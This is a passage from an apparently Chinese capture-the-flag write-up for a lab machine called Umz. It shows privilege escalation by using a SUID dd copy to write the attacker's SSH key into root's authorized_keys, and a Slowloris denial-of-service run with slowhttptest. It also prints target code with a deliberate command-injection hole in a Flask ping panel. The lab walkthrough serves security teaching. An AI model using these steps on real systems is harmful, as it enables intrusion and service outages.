Dashazi<\/code><\/pre>\n<p>\u8fd9\u5c31\u7b80\u5355\u4e86\uff0c\u53c2\u8003\uff1a<a href=\"https:\/\/gtfobins.github.io\/gtfobins\/dd\/#suid\">https:\/\/gtfobins.github.io\/gtfobins\/dd\/#suid<\/a><\/p>\n<p>\u53d1\u73b0\u53ef\u4ee5\u8986\u5199\uff01\uff01\uff01\uff01<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Umz]\n\u2514\u2500$ ssh-keygen -t rsa -o   \nGenerating public\/private rsa key pair.\nEnter file in which to save the key (\/home\/kali\/.ssh\/id_rsa): \nEnter passphrase for &quot;\/home\/kali\/.ssh\/id_rsa&quot; (empty for no passphrase): \nEnter same passphrase again: \nYour identification has been saved in \/home\/kali\/.ssh\/id_rsa\nYour public key has been saved in \/home\/kali\/.ssh\/id_rsa.pub\nThe key fingerprint is:\nSHA256:OCkPXuxUv8gyi4tOpna6DOeGdnd1mflLbXSFEUmB90M kali@kali\nThe key&#039;s randomart image is:\n+---[RSA 3072]----+\n|             o=+ |\n|            . oE |\n|        .    .o..|\n|     . + .     .o|\n|    o B S . +  .o|\n|   . B o o *  o .|\n|..+ . = + o .. o |\n|+O.+ o =    ...  |\n|+*O +.o      ..  |\n+----[SHA256]-----+\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Umz]\n\u2514\u2500$ cat \/home\/kali\/.ssh\/id_rsa.pub                             \nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDJhiN8LdYFGHs44rkM9CNQCtU5H0ATufxm4VeW5okyibSxVqjfdmM0wv++TtZpt8029LfR7rHS7r4X+6Ea8\/FMyGS1BW\/XcFtSjJVqmilxOOcremXFsLv2Wxilp21kHg8lM4k3AAI\/w15NpMYqAZl9znAvvywnfaI2aM8fkeYSyOcywIAUoi\/LfOkP4uuJHBBSJ26ZDZyXc9eo3uQN+569x4\/NouqXhNltIRH38uvVHKjXJ5p8QEJegajlVPpxQiii1+ZiqSe0DekSzSBuk8PYIWFXmyW9CQ28u6CQHPBCQVx9EJyAZ3H41WC5SAWpI4YcWIXz8AzepfUxzUbSWjz8YLh\/STI4eWVk0ywh7n3XdpXMaKHQu2rQZlLOL47m0eMjZU3WTJYqKHSYGLP94OwnViPxu\/jI5E57SyuvRp4VTzRLGOsuA4Rqt41C4rfC9\/EGKbYMADQ4jRSAWNPrrkq8DaE741CYBGPvZm5LbEfF8rQl6T1\/nmDqLtvoZPQtBqU= kali@kali\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Umz]\n\u2514\u2500$ cp \/home\/kali\/.ssh\/id_rsa .\/  \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Umz]\n\u2514\u2500$ cp \/home\/kali\/.ssh\/id_rsa.pub .\/<\/code><\/pre>\n<p>\u7136\u540e\u8986\u5199\uff1a<\/p>\n<pre><code class=\"language-bash\">umzyyds@Umz:~$ echo &#039;ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDJhiN8LdYFGHs44rkM9CNQCtU5H0ATufxm4VeW5okyibSxVqjfdmM0wv++TtZpt8029LfR7rHS7r4X+6Ea8\/FMyGS1BW\/XcFtSjJVqmilxOOcremXFsLv2Wxilp21kHg8lM4k3AAI\/w15NpMYqAZl9znAvvywnfaI2aM8fkeYSyOcywIAUoi\/LfOkP4uuJHBBSJ26ZDZyXc9eo3uQN+569x4\/NouqXhNltIRH38uvVHKjXJ5p8QEJegajlVPpxQiii1+ZiqSe0DekSzSBuk8PYIWFXmyW9CQ28u6CQHPBCQVx9EJyAZ3H41WC5SAWpI4YcWIXz8AzepfUxzUbSWjz8YLh\/STI4eWVk0ywh7n3XdpXMaKHQu2rQZlLOL47m0eMjZU3WTJYqKHSYGLP94OwnViPxu\/jI5E57SyuvRp4VTzRLGOsuA4Rqt41C4rfC9\/EGKbYMADQ4jRSAWNPrrkq8DaE741CYBGPvZm5LbEfF8rQl6T1\/nmDqLtvoZPQtBqU= kali@kali&#039; | .\/Dashazi of=\/root\/.ssh\/authorized_keys\n1+1 records in\n1+1 records out\n563 bytes copied, 0.000367424 s, 1.5 MB\/s<\/code><\/pre>\n<p>\u5c1d\u8bd5\u767b\u5f55\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506262345948.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506262345948.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250626230422306\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">root@Umz:~# ls -la\ntotal 72\ndrwx------  6 root root  4096 May  3 11:01 .\ndrwxr-xr-x 18 root root  4096 Mar 18 20:37 ..\nlrwxrwxrwx  1 root root     9 Mar 18 21:18 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 root root   570 Jan 31  2010 .bashrc\ndrwxr-xr-x  4 root root  4096 Apr  4 22:04 .cache\n-rw-r--r--  1 root root  1446 May  3 09:45 flask_debug.py\ndrwx------  3 root root  4096 Apr  4 21:00 .gnupg\ndrwxr-xr-x  3 root root  4096 Mar 18 21:04 .local\n-rwxr-xr-x  1 root root  1080 May  3 10:16 monitor.sh\n-rw-r--r--  1 root root   148 Aug 17  2015 .profile\n-rw-r--r--  1 root root    44 May  3 10:25 root.txt\n-rw-r--r--  1 root root    66 May  3 09:47 .selected_editor\ndrw-------  2 root root  4096 Jun 26 11:03 .ssh\n-rw-rw-rw-  1 root root 23257 May  3 11:01 .viminfo\nroot@Umz:~# cat flask_debug.py\n# \u6587\u4ef6\u540d\uff1aflask_debug.py\nfrom flask import Flask, request, render_template_string, redirect, session\nimport subprocess\n\napp = Flask(__name__)\napp.secret_key = &#039;supersecretkey&#039;\n\n# \u7ba1\u7406\u5458\u767b\u5f55\u9a8c\u8bc1\n@app.route(&#039;\/login&#039;, methods=[&#039;POST&#039;])\ndef login():\n    if request.form.get(&#039;user&#039;) == &#039;admin&#039; and request.form.get(&#039;pass&#039;) == &#039;admin&#039;:\n        session[&#039;logged_in&#039;] = True\n        return redirect(&#039;\/admin&#039;)\n    return &quot;\u767b\u5f55\u5931\u8d25\uff01&quot;\n\n# \u7ba1\u7406\u5458\u8fd0\u7ef4\u754c\u9762\uff08\u542b\u547d\u4ee4\u6ce8\u5165\u6f0f\u6d1e\uff09\n@app.route(&#039;\/admin&#039;, methods=[&#039;GET&#039;, &#039;POST&#039;])\ndef admin_panel():\n    if not session.get(&#039;logged_in&#039;):\n        return redirect(&#039;\/login&#039;)\n\n    output = &quot;&quot;\n    if request.method == &#039;POST&#039;:\n        cmd = request.form.get(&#039;cmd&#039;, &#039;&#039;)\n        # \u6f0f\u6d1e\u70b9\uff1a\u672a\u8fc7\u6ee4&amp;&amp;\u7b26\u53f7\n        try:\n            result = subprocess.run(\n                f&quot;ping -c 4 {cmd}&quot;, \n                shell=True, \n                capture_output=True, \n                text=True\n            )\n            output = result.stdout or result.stderr\n        except Exception as e:\n            output = str(e)\n\n    return render_template_string(&#039;&#039;&#039;\n        &lt;h3&gt;\u8fd0\u7ef4\u9762\u677f&lt;\/h3&gt;\n        &lt;form method=&quot;POST&quot;&gt;\n            &lt;input type=&quot;text&quot; name=&quot;cmd&quot; placeholder=&quot;\u8f93\u5165IP\u5730\u5740&quot; required&gt;\n            &lt;input type=&quot;submit&quot; value=&quot;\u6267\u884cPing&quot;&gt;\n        &lt;\/form&gt;\n        &lt;pre&gt;{{ output }}&lt;\/pre&gt;\n    &#039;&#039;&#039;, output=output)\n\nif __name__ == &#039;__main__&#039;:\n    app.run(host=&#039;0.0.0.0&#039;, port=80, debug=True)\nroot@Umz:~# cat monitor.sh\n#!\/bin\/bash\n# \u6587\u4ef6\u540d\uff1amonitor.sh\nTARGET_URL=&quot;http:\/\/localhost\/index.php&quot;\nCHECK_INTERVAL=3  # \u68c0\u6d4b\u95f4\u96943\u79d2\nMAX_FAILS=3        # \u8fde\u7eed\u5931\u8d253\u6b21\u89e6\u53d1\u64cd\u4f5c\nFAIL_COUNT=0\n\nwhile true; do\n    # \u68c0\u67e5\u9875\u9762\u662f\u5426\u5305\u542b\u7279\u5f81\u5b57\u7b26\u4e32\uff08\u8d85\u65f63\u79d2\uff09\n    RESPONSE=$(timeout 3 curl -s -w &quot;%{http_code}&quot; &quot;$TARGET_URL&quot;)\n    STATUS=$?\n    HTTP_CODE=$(echo &quot;$RESPONSE&quot; | tail -n1)\n    CONTENT=$(echo &quot;$RESPONSE&quot; | head -n-1)\n\n    # \u5224\u65ad\u6761\u4ef6\uff1aHTTP\u72b6\u6001\u7801\u975e200\u6216\u5185\u5bb9\u4e0d\u5305\u542b\u7279\u5f81\n    if [[ $STATUS -ne 0 || $HTTP_CODE != 200 || ! &quot;$CONTENT&quot; =~ &quot;HEALTHY_STRING&quot; ]]; then\n        FAIL_COUNT=$((FAIL_COUNT + 1))\n        echo &quot;[$(date)] \u68c0\u6d4b\u5230\u670d\u52a1\u5f02\u5e38\uff0c\u5931\u8d25\u6b21\u6570\uff1a$FAIL_COUNT&quot; &gt;&gt; \/var\/log\/monitor.log\n\n        if [ $FAIL_COUNT -ge $MAX_FAILS ]; then\n            echo &quot;[$(date)] \u89e6\u53d1\u6545\u969c\u8f6c\u79fb\uff01\u5173\u95edApache\uff0c\u542f\u52a8Flask\u670d\u52a1...&quot; &gt;&gt; \/var\/log\/monitor.log\n            systemctl stop apache2\n            sudo -u welcome python3 \/opt\/flask-debug\/flask_debug.py\n            exit 0\n        fi\n    else\n        FAIL_COUNT=0\n    fi\n\n    sleep $CHECK_INTERVAL\ndone\nroot@Umz:~# cat root.txt\nflag{root-a73c45107081c08dd4560206b8ef8205}<\/code><\/pre>\n<h2>\u5947\u602a\u7684\u5730\u65b9<\/h2>\n<p>\u6253\u5b8c\u4ee5\u540e\u6211\u770b\u4e86\u4e0b\u5176\u4ed6\u5e08\u5085\u7684wp\uff0c\u53d1\u73b0\u4e86\u5947\u602a\u7684\u73b0\u8c61\uff0c\u6211\u597d\u50cf\u8df3\u8fc7\u4e86\u4e00\u4e9b\u4e1c\u897f\u3002\u3002\u3002\u3002\u3002\u91cd\u65b0\u542f\u52a8\u9776\u673a\u8fdb\u884c\u6f14\u793a\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Umz]\n\u2514\u2500$ nmap $IP -sV -A -p-   \nStarting Nmap 7.95 ( https:\/\/nmap.org ) at 2025-06-26 11:07 EDT\nNmap scan report for 192.168.10.104\nHost is up (0.00070s latency).\nNot shown: 65533 closed tcp ports (reset)\nPORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)\n| ssh-hostkey: \n|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)\n|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)\n|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)\n80\/tcp open  http    Apache httpd 2.4.62 ((Debian))\n|_http-server-header: Apache\/2.4.62 (Debian)\n|_http-title: cyber fortress 9000\nMAC Address: 08:00:27:4A:01:25 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nDevice type: general purpose|router\nRunning: Linux 4.X|5.X, MikroTik RouterOS 7.X\nOS CPE: cpe:\/o:linux:linux_kernel:4 cpe:\/o:linux:linux_kernel:5 cpe:\/o:mikrotik:routeros:7 cpe:\/o:linux:linux_kernel:5.6.3\nOS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)\nNetwork Distance: 1 hop\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE\nHOP RTT     ADDRESS\n1   0.70 ms 192.168.10.104\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 32.38 seconds<\/code><\/pre>\n<p>\u8fd9\u91cc\u5c45\u7136\u548c\u6211\u4e00\u5f00\u59cb\u4e0d\u4e00\u6837\u3002\u3002\u3002\u3002\u89c1\u9b3c\u4e86\u3002\u3002\u3002\u3002\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506262345949.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506262345949.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250626231636340\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506262345950.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506262345950.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250626231701738\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u8fd9\u91cc\u9700\u8981\u8fdb\u884c<code>ddos<\/code>\u4ee5\u6295\u5582\u4e00\u4e0b\u8fd9\u4e2a\u7f51\u7ad9\u3002\u3002<\/p>\n<p>\u7f51\u7ad9\u63d0\u5230\u4e86\u5f88\u591a\uff0c\u8ba9\u54b1\u4eec\u653e\u5fc3\u6d4b\u8bd5\uff1a<\/p>\n<ul>\n<li>\u26a0\ufe0f warning: we want your ddos attacks     \u60f3\u8981<\/li>\n<li>\ud83d\udee1\ufe0f try all you want                                   \u5c3d\u4f60\u6240\u80fd<\/li>\n<li>\ud83d\udca3 our backups are already online             \u6709\u5907\u4efd\u5728\u7ebf\uff0c\u6253\u70b8\u4e86\u6ca1\u4e8b<\/li>\n<li>\u26a1 your attacks feed our defense ai            \u6709\u9632\u62a4\u7684AI\u7a0b\u5e8f\uff0c\u522b\u6015<\/li>\n<\/ul>\n<pre><code>http:\/\/192.168.10.104\/index.php<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506262345951.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506262345951.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250626234256537\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4e00\u4e2a\u8bf7\u6c42\u589e\u52a0\u4e00\u70b9\uff0c\u8fbe\u5230<code>10000<\/code>\u8017\u5c3d\u8d44\u6e90\u3002<\/p>\n<p>\u5c1d\u8bd5\u5229\u7528<code>ddos<\/code>\u8fdb\u884c\u6d4b\u8bd5\uff0c\u76f8\u5173\u5de5\u5177\u5f88\u591a\u6211\u8fd9\u91cc\u968f\u4fbf\u627e\u4e86\u4e00\u4e2a<code>slowhttptest<\/code><\/p>\n<pre><code class=\"language-bash\"># sudo apt install slowhttptest\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Umz]\n\u2514\u2500$ slowhttptest -c 1000 -H -g -o slowhttp -i 10 -r 200 -t GET -u http:\/\/$IP\/ -x 24 -p 3\n# -c 1000\u4f7f\u7528Slowloris \u6a21\u5f0f () \u76841000 \u4e2a\u8fde\u63a5 ( ) -H\uff0c\u5e76\u751f\u6210\u7edf\u8ba1\u6570\u636e (-g&gt;\u5e26\u6709\u8f93\u51fa\u6587\u4ef6\u540d (- o slowhttp)\u3002\u4f7f\u7528 10 \u79d2\u7b49\u5f85\u6570\u636e ( -i 10)\uff0c\u4f7f\u7528 200 \u4e2a\u8fde\u63a5 ( )\u5bf9\u76ee\u6807 URL ( )-r 200\u8fdb\u884c GET \u8bf7\u6c42 ( ) \uff0c\u6700\u5927\u957f\u5ea6\u4e3a 24 \u5b57\u8282\uff08\u8d85\u65f6\u65f6\u95f4\u4e3a 3 \u79d2\uff09\uff1a<\/code><\/pre>\n<p>\u7b49\u4e2a5\u79d2\u5de6\u53f3\uff0c\u5c31\u4f1a\u53d8\u6210\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506262345952.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506262345952.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250626232201983\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u770b\u5230\u670d\u52a1\u4e0d\u53ef\u7528\u5c31\u8bf4\u660e\u6210\u529f\u4e86\uff0c\u9a8c\u8bc1\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Umz]\n\u2514\u2500$ sudo nmap -sS $IP                                                                   \nStarting Nmap 7.95 ( https:\/\/nmap.org ) at 2025-06-26 11:22 EDT\nNmap scan report for umz.hmv (192.168.10.104)\nHost is up (0.00037s latency).\nNot shown: 998 closed tcp ports (reset)\nPORT     STATE SERVICE\n22\/tcp   open  ssh\n8080\/tcp open  http-proxy\nMAC Address: 08:00:27:4A:01:25 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\n\nNmap done: 1 IP address (1 host up) scanned in 0.52 seconds<\/code><\/pre>\n<p>\u53d1\u73b0\u7aef\u53e3\u679c\u7136\u5173\u6389\u4e86\u3002\u3002\u3002\u3002\u3002\u3002<\/p>\n<p>\u65b9\u6cd5\u5f88\u591a\uff0c\u6bd4\u5982\u8fd8\u53ef\u4ee5\u4f7f\u7528\u5de5\u5177\u8fdb\u884c\u9ad8\u5e76\u53d1\u7684\u626b\u63cf\uff0c\u6bd4\u5982<code>feroxbuster<\/code>,<code>gobuster<\/code>,<code>dirsearch<\/code>,<code>dirbuster<\/code>,<code>ffuf<\/code>,<code>wfuzz<\/code>\u540c\u65f6\u5f00\u52a8\uff0c\u4e3b\u6253\u7684\u5c31\u662f\u4e00\u4e2a\u5dee\u751f\u6587\u5177\u591a\uff0c\u6216\u8005\u628a\u7ebf\u7a0b\u8c03\u7684\u7279\u522b\u9ad8\u5e94\u8be5\u4e5f\u53ef\u4ee5\uff1f<\/p>\n<h2>\u76f8\u5173\u4fe1\u606f<\/h2>\n<h3>index.php<\/h3>\n<pre><code class=\"language-php\">(remote) welcome@Umz:\/home\/welcome$ cd \/var\/www\/html\n(remote) welcome@Umz:\/var\/www\/html$ ls -la\ntotal 16\ndrwxr-xr-x 2 root root 4096 May  3 11:01 .\ndrwxr-xr-x 3 root root 4096 Apr  4 23:20 ..\n-rw-r--r-- 1 root root 3024 May  3 11:01 index.html\n-rw-r--r-- 1 root root 3306 May  3 09:40 index.php\n(remote) welcome@Umz:\/var\/www\/html$ cat index.php\n&lt;?php\ndefine(&#039;HEALTHY_STRING&#039;, &#039;SERVICE_IS_HEALTHY&#039;);\n\nfunction generate_primes($max) {\n    $primes = [];\n    for ($i = 2; $i &lt;= $max; $i++) {\n        $is_prime = true;\n        for ($j = 2; $j &lt;= sqrt($i); $j++) {\n            if ($i % $j == 0) {\n                $is_prime = false;\n                break;\n            }\n        }\n        if ($is_prime) $primes[] = $i;\n    }\n    return $primes;\n}\n\n$max_calculation = isset($_GET[&#039;stress&#039;]) ? intval($_GET[&#039;stress&#039;]) : 10000;\n$primes = generate_primes($max_calculation);\n\nheader(&#039;Content-Type: text\/html&#039;);\n?&gt;\n&lt;!DOCTYPE html&gt;\n&lt;html lang=&quot;en&quot;&gt;\n&lt;head&gt;\n    &lt;meta charset=&quot;UTF-8&quot;&gt;\n    &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1.0&quot;&gt;\n    &lt;title&gt;Resource Stress Test&lt;\/title&gt;\n    &lt;style&gt;\n        :root {\n            --primary-color: #2c3e50;\n            --secondary-color: #3498db;\n            --warning-color: #e74c3c;\n        }\n\n        body {\n            font-family: &#039;Segoe UI&#039;, Tahoma, Geneva, Verdana, sans-serif;\n            line-height: 1.6;\n            margin: 0;\n            padding: 20px;\n            background-color: #f5f6fa;\n        }\n\n        .container {\n            max-width: 800px;\n            margin: 0 auto;\n            background: white;\n            padding: 30px;\n            border-radius: 10px;\n            box-shadow: 0 0 20px rgba(0,0,0,0.1);\n        }\n\n        .alert {\n            padding: 15px;\n            background-color: #f8d7da;\n            border: 1px solid #f5c6cb;\n            border-radius: 5px;\n            color: #721c24;\n            margin-bottom: 25px;\n        }\n\n        .status-header {\n            color: var(--primary-color);\n            border-bottom: 2px solid var(--secondary-color);\n            padding-bottom: 15px;\n            margin-bottom: 25px;\n        }\n\n        .load-indicator {\n            padding: 10px;\n            background: #f8f9fa;\n            border-radius: 5px;\n            margin: 20px 0;\n        }\n\n        .prime-count {\n            color: var(--secondary-color);\n            font-weight: bold;\n        }\n    &lt;\/style&gt;\n&lt;\/head&gt;\n&lt;body&gt;\n    &lt;div class=&quot;container&quot;&gt;\n        &lt;div class=&quot;alert&quot;&gt;\n            \u26a0\ufe0f DDoS Protection Active: This service is protected by automated anti-DDoS measures. \n            Excessive requests will trigger security protocols.\n        &lt;\/div&gt;\n\n        &lt;h1 class=&quot;status-header&quot;&gt;Resource Stress Test Interface&lt;\/h1&gt;\n\n        &lt;div class=&quot;load-indicator&quot;&gt;\n            &lt;h2&gt;Service Status Monitor&lt;\/h2&gt;\n            &lt;p&gt;\ud83d\udfe2 System Operational - Health Check Identifier: &lt;strong&gt;HEALTHY_STRING&lt;\/strong&gt;&lt;\/p&gt;\n        &lt;\/div&gt;\n\n        &lt;div class=&quot;calculation-summary&quot;&gt;\n            &lt;h3&gt;Prime Number Generation&lt;\/h3&gt;\n            &lt;p&gt;Successfully generated prime numbers up to \n                &lt;span class=&quot;prime-count&quot;&gt;&lt;?= $max_calculation ?&gt;&lt;\/span&gt;\n            &lt;\/p&gt;\n            &lt;p&gt;Total primes calculated: &lt;strong&gt;&lt;?= count($primes) ?&gt;&lt;\/strong&gt;&lt;\/p&gt;\n        &lt;\/div&gt;\n\n        &lt;div class=&quot;system-notice&quot;&gt;\n            &lt;h3&gt;Security Notice&lt;\/h3&gt;\n            &lt;p&gt;This diagnostic interface is protected by multiple security layers:&lt;\/p&gt;\n            &lt;ul&gt;\n                &lt;li&gt;Automated traffic analysis&lt;\/li&gt;\n                &lt;li&gt;Request rate limiting&lt;\/li&gt;\n                &lt;li&gt;Connection fingerprinting&lt;\/li&gt;\n            &lt;\/ul&gt;\n        &lt;\/div&gt;\n    &lt;\/div&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;<\/code><\/pre>\n<h3>flask_debug<\/h3>\n<pre><code class=\"language-python\">(remote) welcome@Umz:\/opt\/flask-debug$ cat flask_debug.py\nfrom flask import Flask, request, render_template_string, redirect, session\nimport subprocess\n\napp = Flask(__name__)\napp.secret_key = &#039;supersecretkey&#039;\napp.config[&#039;SESSION_COOKIE_NAME&#039;] = &#039;debug_session&#039;\n\nLOGIN_TEMPLATE = &#039;&#039;&#039;\n&lt;!DOCTYPE html&gt;\n&lt;html&gt;\n&lt;head&gt;\n    &lt;title&gt;Debug Console Login&lt;\/title&gt;\n    &lt;style&gt;\n        body { \n            font-family: Arial, sans-serif; \n            background: #f0f2f5; \n            margin: 0; \n            display: flex; \n            justify-content: center; \n            align-items: center; \n            min-height: 100vh;\n        }\n        .login-box {\n            background: white;\n            padding: 2rem;\n            border-radius: 8px;\n            box-shadow: 0 2px 10px rgba(0,0,0,0.1);\n            width: 350px;\n        }\n        h2 { \n            color: #1a73e8; \n            text-align: center;\n            margin-bottom: 1.5rem;\n        }\n        .form-group { \n            margin-bottom: 1rem; \n        }\n        input[type=&quot;text&quot;], \n        input[type=&quot;password&quot;] {\n            width: 100%;\n            padding: 0.8rem;\n            border: 1px solid #ddd;\n            border-radius: 4px;\n            box-sizing: border-box;\n        }\n        button {\n            background: #1a73e8;\n            color: white;\n            width: 100%;\n            padding: 0.8rem;\n            border: none;\n            border-radius: 4px;\n            cursor: pointer;\n            font-weight: bold;\n        }\n        .error { \n            color: #dc3545; \n            text-align: center;\n            margin-top: 1rem;\n        }\n    &lt;\/style&gt;\n&lt;\/head&gt;\n&lt;body&gt;\n    &lt;div class=&quot;login-box&quot;&gt;\n        &lt;h2&gt;System Debug Console&lt;\/h2&gt;\n        &lt;form method=&quot;POST&quot;&gt;\n            &lt;div class=&quot;form-group&quot;&gt;\n                &lt;input type=&quot;text&quot; name=&quot;user&quot; placeholder=&quot;Username&quot; required&gt;\n            &lt;\/div&gt;\n            &lt;div class=&quot;form-group&quot;&gt;\n                &lt;input type=&quot;password&quot; name=&quot;pass&quot; placeholder=&quot;Password&quot; required&gt;\n            &lt;\/div&gt;\n            &lt;button type=&quot;submit&quot;&gt;Login&lt;\/button&gt;\n            {% if error %}&lt;div class=&quot;error&quot;&gt;Authentication failed!&lt;\/div&gt;{% endif %}\n        &lt;\/form&gt;\n    &lt;\/div&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;\n&#039;&#039;&#039;\n\nADMIN_TEMPLATE = &#039;&#039;&#039;\n&lt;!DOCTYPE html&gt;\n&lt;html&gt;\n&lt;head&gt;\n    &lt;title&gt;Maintenance Panel&lt;\/title&gt;\n    &lt;style&gt;\n        body { \n            font-family: Arial, sans-serif; \n            background: #f8f9fa; \n            margin: 2rem;\n        }\n        .header {\n            color: #1a73e8;\n            border-bottom: 2px solid #1a73e8;\n            padding-bottom: 1rem;\n            margin-bottom: 2rem;\n        }\n        .console-box {\n            background: white;\n            padding: 2rem;\n            border-radius: 8px;\n            box-shadow: 0 2px 10px rgba(0,0,0,0.1);\n            max-width: 800px;\n            margin: 0 auto;\n        }\n        input[type=&quot;text&quot;] {\n            width: 300px;\n            padding: 0.8rem;\n            border: 1px solid #ddd;\n            border-radius: 4px;\n            margin-right: 1rem;\n        }\n        button {\n            background: #1a73e8;\n            color: white;\n            padding: 0.8rem 1.5rem;\n            border: none;\n            border-radius: 4px;\n            cursor: pointer;\n        }\n    